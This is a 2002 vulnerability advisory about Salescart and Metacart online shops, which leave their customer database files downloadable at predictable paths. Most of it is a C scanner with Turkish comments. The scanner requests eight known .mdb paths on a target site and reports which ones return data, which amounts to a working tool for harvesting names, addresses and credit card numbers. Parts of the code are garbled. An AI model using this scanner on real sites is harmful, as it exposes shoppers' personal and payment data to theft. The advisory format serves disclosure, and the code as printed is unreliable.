Salescart vuln.

2002-06-26T00:00:00
ID SECURITYVULNS:DOC:3130
Type securityvulns
Reporter Securityvulns
Modified 2002-06-26T00:00:00

Description

Summary: In a business website which is made by Salescart, all customer records related to that website are reachable. All database can be hide to shop.mdb file, in fpdb directory. Any user can be reach this database whithous permission. There are some special informations this database and they are; name, surname, adress, e-mail, phone number, credit card number, company name ... The credit card numbers in shop.mdb file is placed in query part.

Problem: Accessing any of the following URL will return the database used by the product: http://xxxshop.com/fpdb/shop.mdb

/ Salescart ve Metacart kullanILan bir alI$veri$ sitesindeki mu$teri kayItLarInI bulma /

/ tacettinkaradeniz@yahoo.com karadenizeregli@2002 /

/* I LoVe CiLeK :>

/ Not: Bu programI ba$tan sona ben yazmadIm. Sadece gerekli yerlerde degi$iklik yaparak istediGim duzene getirdim :> /

include <string.h>

include <netdb.h>

include <ctype.h>

include <arpa/nameser.h>

include <sys/stat.h>

include <strings.h>

include <stdio.h>

include <stdlib.h>

include <unistd.h>

include <sys/socket.h>

include <fcntl.h>

include <sys/types.h>

include <sys/socket.h>

include <netinet/in.h>

include <signal.h>

include <stdio.h>

void main(int argc, char *argv[]) {

char bulunan; char tampon[1024]; char mesaj[] = "200"; int toplam=0; int sayac; int buldum=0; char shoptampon[20]; char tmp[10]; char *hata[10];

int sock; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long giris; unsigned long duzelt;

tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n"; tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n"; tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n"; tmp[4]="GET /shopping/database/metacart.mdb HTTP/1.0\n\n"; tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n"; tmp[6]="GET /metacart/database/metacart.mdb HTTP/1.0\n\n"; tmp[7]="GET /mcartfree/database/metacart.mdb HTTP/1.0\n\n"; tmp[8]="GET /ASP/cart/database/metacart.mdb HTTP/1.0\n\n";

hata[1] = "/fpdb/shop.mdb "; hata[2] = "/shoponline/fpdb/shop.mdb "; hata[3] = "/database/metacart.mdb "; hata[4] = "/shopping/database/metacart.mdb "; hata[5] = "/shop/database/metacart.mdb "; hata[6] = "/metacart/database/metacart.mdb "; hata[7] = "/mcartfree/database/metacart.mdb "; hata[8] = "/ASP/cart/database/metacart.mdb ";

if (argc<2) { system("clear"); printf("\n\t _ "); printf("\n\t| . _ _ | o "); printf("\n\t| | (/ (| | | "); printf("\n\t | "); printf("\n\nSalescart - Metacart (c) 2002 "); printf("\nKullanImI : %s www.xxxshopxyz.com \n\n",argv[0]);

exit(0); }

if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } system("clear"); printf("\n\t _ "); printf("\n\t| . _ _ | o "); printf("\n\t| | (/ (| | | "); printf("\n\t | "); printf("\n\t Salescart - Metacart (c) 2002 ");

giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } send(sock, "HEAD / HTTP/1.0\n\n",17,0);

recv(sock, tampon, sizeof(tampon),0); printf("%s",tampon); close(sock); system("clear"); printf("Tarama YapILIyor..\n\n");

while(toplam++ < 8) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char )&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr)&sin, sizeof(sin))!=0) { perror("connect"); }

for(sayac=0;sayac < 20;sayac++) { shoptampon[sayac] = '\0'; }

send(sock, tmp[toplam],strlen(tmp[toplam]),0); recv(sock, shoptampon, sizeof(shoptampon),0);

bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL) { printf("%s : ",hata[toplam]); printf(" Oleyyy.. Bulundu :\)\n");++buldum; } close(sock); }

if (buldum) { printf("\n Tarama isLemi %s web sistesi icin bitti.\n", argv[1]); } else printf ("\n Uzgunum tarama sonucu bir veri bulunamamIstIr...\n\n");

}


Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com